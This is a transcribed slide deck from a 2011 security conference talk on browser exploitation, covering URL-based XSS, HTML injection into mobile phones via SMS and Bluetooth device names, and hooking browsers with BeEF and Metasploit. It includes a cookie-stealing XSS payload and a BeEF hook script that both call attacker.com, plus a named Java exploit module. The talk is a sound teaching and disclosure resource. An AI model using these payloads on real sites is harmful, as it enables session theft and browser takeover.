Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2011]
0 likes•2,334 views
This document summarizes an upcoming presentation on browser exploitation techniques. It will discuss previous episodes on the topic, the state of cross-site scripting (XSS) vulnerabilities, a new type of non-persistent global or URL-based XSS, exploiting mobile devices through multiple technologies like SMS and Bluetooth, and demonstrating exploitation using tools like BeEF and Metasploit. The presentation aims to show how easily a browser can be attacked and to change perceptions of XSS vulnerabilities.
![Target Web Application
• Initially discovered during a real web
application pen-test in Spain
• Multi-language support web-app
– Top HTML header includes links to the other
languages (on every web page): URL
https://www.example.com/portal/ […params]
<UL class=cabecera_idiomas>
<LI><a href="https://www.example.com/portal/?lang=es">
Bienvenidos</a></LI>
<LI><a href="https://www.example.com/portal/?lang=en">
Welcome</a></LI>
...</UL>
Copyright © 2011 Taddong S.L. www.taddong.com 10](https://image.slidesharecdn.com/raulsiles-browserexploitationforfunprofitrevolutions-110307132029-phpapp01/85/Raul-Siles-Browser-Exploitation-for-Fun-and-Profit-Revolutions-RootedCON-2011-10-320.jpg)
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2011]
- 1. www.taddong.com Browser Exploitation for Fun and Profit Revolutions (…in less than 24 hours ) Raúl Siles [email protected] March 4, 2011 Copyright © 2011 Taddong S.L. All rights reserved.
- 2. Outline • On previous episodes… (3rd on the series) • XSS state-of-the-art (≈ WCI) • “New” kind of XSS: – Global (or URL-based) non-persistent XSS • Multi-technology WCI on mobile devices • Browser exploitation through XSS – BeEF + Metasploit + attacker’s imagination • References Copyright © 2011 Taddong S.L. www.taddong.com 2
- 3. On Previous Episodes… • “Browser Exploitation for Fun & Profit” – Target: Web browser (& its plug-ins) – Web application pen-tester setup & Demos – Samurai WTF & BeEF & Metasploit http://blog.taddong.com/2010/11/browser-exploitation-for-fun-profit.html • “Browser Exploitation for Fun & Profit Reloaded” – Top vuln applications 2010: Java & Adobe – Updating to the Ruby-based BeEF version – Web browsing best practices http://blog.taddong.com/2010/12/browser-exploitation-for-fun-profit.html Copyright © 2011 Taddong S.L. www.taddong.com 3
- 4. XSS State-of-the-Art Copyright © 2011 Taddong S.L. www.taddong.com 4
- 5. Can My Browser Be Attacked? • You only need to visit a single malicious web page… and be vulnerable to a single flaw… on your web browser or any of the installed plug-ins or add-ons… and … Trusted websites attacking you • Drive-by-XSS Lots of attack vectors… such as XSS Copyright © 2011 Taddong S.L. www.taddong.com 5
- 6. Cross-Site Scripting (XSS) • XSS (JavaScript) – Why not “web content injection” (WCI)? – Others: HTML, images, Java, Flash, ActiveX… • XSS types – Non-persistent & Persistent & … • Risk/Impact perception: Low – Industry & pen-tests Copyright © 2011 Taddong S.L. www.taddong.com 6
- 7. Who is (not) vulnerable to XSS? xssed.com Copyright © 2011 Taddong S.L. www.taddong.com 7
- 8. “New” kind of XSS: Global (or URL-based) Non-Persistent XSS Copyright © 2011 Taddong S.L. www.taddong.com 8
- 9. Traditional XSS Protections • Enforce input validation and output encoding – GET & POST parameters – HTTP headers GET /portal?lang=es&q=rootedcon&year=2011 HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14 Accept: text/html,application/xhtml+xml,application/ xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Referer: http://www.example.com/main ... Copyright © 2011 Taddong S.L. www.taddong.com 9
- 10. Target Web Application • Initially discovered during a real web application pen-test in Spain • Multi-language support web-app – Top HTML header includes links to the other languages (on every web page): URL https://www.example.com/portal/ […params] <UL class=cabecera_idiomas> <LI><a href="https://www.example.com/portal/?lang=es"> Bienvenidos</a></LI> <LI><a href="https://www.example.com/portal/?lang=en"> Welcome</a></LI> ...</UL> Copyright © 2011 Taddong S.L. www.taddong.com 10
- 11. Global (or URL-based) non- persistent XSS (1) • HTML or script injection after the “?” without parameters https://www.example.com/portal/?"><script> document.location='https://www.attacker.com/triqui.php? c='+document.cookie</script> • The script is reflected N-times on the web page received as the response – One per language (by default) • Similar scenario before the “?” (URL) or between parameters Copyright © 2011 Taddong S.L. www.taddong.com 11
- 12. Global (or URL-based) non- persistent XSS (2) • Global: All web application resources (URLs) are vulnerable to XSS – Not a specific HTTP parameter – Better for: • Obfuscation (long URLs) • Social engineering • More damaging attacks (e.g. web login page) • Defenses: input validation and output encoding on everything (including the URL) Copyright © 2011 Taddong S.L. www.taddong.com 12
- 13. Multi-technology WCI (≈XSS) on Mobile Devices Copyright © 2011 Taddong S.L. www.taddong.com 13
- 14. XSS Everywhere • XSS: the input is reflected on the output – Immediately or “somewhere in time” • Any input is a potential vulnerable candidate, as well as any output • Web content injection (≈XSS) through multiple technologies on mobile devices – SMS and Bluetooth What about… Wi-Fi, 2G/3G, etc? (network name) Copyright © 2011 Taddong S.L. www.taddong.com 14
- 15. SMS • Initially discovered on Palm WebOS – Open web sites, download files, install new root CA certs, turn off radio, or wipe device • Extended to Windows Mobile & HTC – Web-based SMS preview capabilities on HTC Windows Mobile smart-phones (scripting) • http://www.securityfocus.com/archive/1/510897/30/ • Defenses: Disable preview or update http://intrepidusgroup.com/insight/webos/ Copyright © 2011 Taddong S.L. www.taddong.com 15
- 16. SMS on Windows Mobile 6.5 From: 666123666 To: 6001234567 Mensaje (SMS): <script>alert ('Ejecucion de Javascript')</ script> Copyright © 2011 Taddong S.L. www.taddong.com 16
- 17. Bluetooth • Discovered on Windows Mobile 6.1 – Native web-based GUI notification subsystem • Bluetooth pairing and profile access – Bluetooth authorization message (<=32 chars) – Only HTML (no scripting): Blueline attacks • Defenses: Customized notification subsystem (vendor based) http://www.hackingexposedwireless.com Copyright © 2011 Taddong S.L. www.taddong.com 17
- 18. Bluetooth on Windows Mobile 6.1 # hciconfig hci0 name "<b>Ordenador</b> no peligro<i>so</i>" # hciconfig hci0 name "Mantener Bluetooth activo?<br><p" Copyright © 2011 Taddong S.L. www.taddong.com 18
- 19. Root Cause of the Problem • Web contents everywhere (or converted to) • Information displayed (GUI) via a web- based engine (HTML, JavaScript & more) Databases Web-App Copyright © 2011 Taddong S.L. www.taddong.com 19
- 20. Near Future Vulnerable Inputs • Camera: Barcode or QR code reader, etc • Microphone: HTML-based audio transcript Copyright © 2011 Taddong S.L. www.taddong.com 20
- 21. Browser Exploitation through XSS Copyright © 2011 Taddong S.L. www.taddong.com 21
- 22. Demonstrating XSS • Most common example: – Quick for XSS discovery but… <script>alert(‘XSS’)</script> How to contribute to change this general perception? Copyright © 2011 Taddong S.L. www.taddong.com 22
- 23. Live Demo Copyright © 2011 Taddong S.L. www.taddong.com 23
- 24. Exploiting Java CVE-2010-0886 • All vulnerability details are on previous episodes – Java 6 Update (10 =< x <= 19) • “Do you know Rubén Santamarta?” • Exploit requirements: – Metasploit running as root (sudo) – SMB not running on pen-tester system – WebClient (WebDAV Mini-Redirector) running on target (by default) – WEBDAV requires SRVPORT=80 and URIPATH=/ (BeEF is running there!! Use != IP addresses) exploit/windows/browser/java_ws_arginject_altjvm Copyright © 2011 Taddong S.L. www.taddong.com 24
- 25. BeEF Exploitation • This is the only script the attacker needs to inject in the target web application: (PHP) <script src="http://www.attacker.com/ beef/hook/beefmagic.js"></script> • Metasploit integration • Persistent hooking (100% iframe) – URL limitation (& favicon) – Yori Kvitchko – Not in some mobile devices… Copyright © 2011 Taddong S.L. www.taddong.com 25
- 26. Persistent Hooking in Mobile Devices through URL hiding • URL hiding or addr. bar replacement • UI spoofing Safari on the iPhone – JavaScript pushes real address bar up • Android too http://evil-lemur.com/mobile/ http://software-security.sans.org/blog/2010/11/29/ui- spoofing-safari-iphone Copyright © 2011 Taddong S.L. www.taddong.com 26
- 27. References • Presentations in the Browser Exploitation for Fun & Profit Series: http://blog.taddong.com • Samurai WTF (Web Testing Framework): – http://sourceforge.net/projects/samurai/ • BeEF – http://www.bindshell.net/tools/beef/ – https://code.google.com/p/beef/ • MetaSploit Framework (MSF): (autopwn) – http://www.metasploit.com – http://www.metasploit.com/framework/modules/ Copyright © 2011 Taddong S.L. www.taddong.com 27
- 28. Questions? Copyright © 2011 Taddong S.L. www.taddong.com 28
- 29. www.taddong.com Blog: blog.taddong.com Twitter: @taddong [email protected]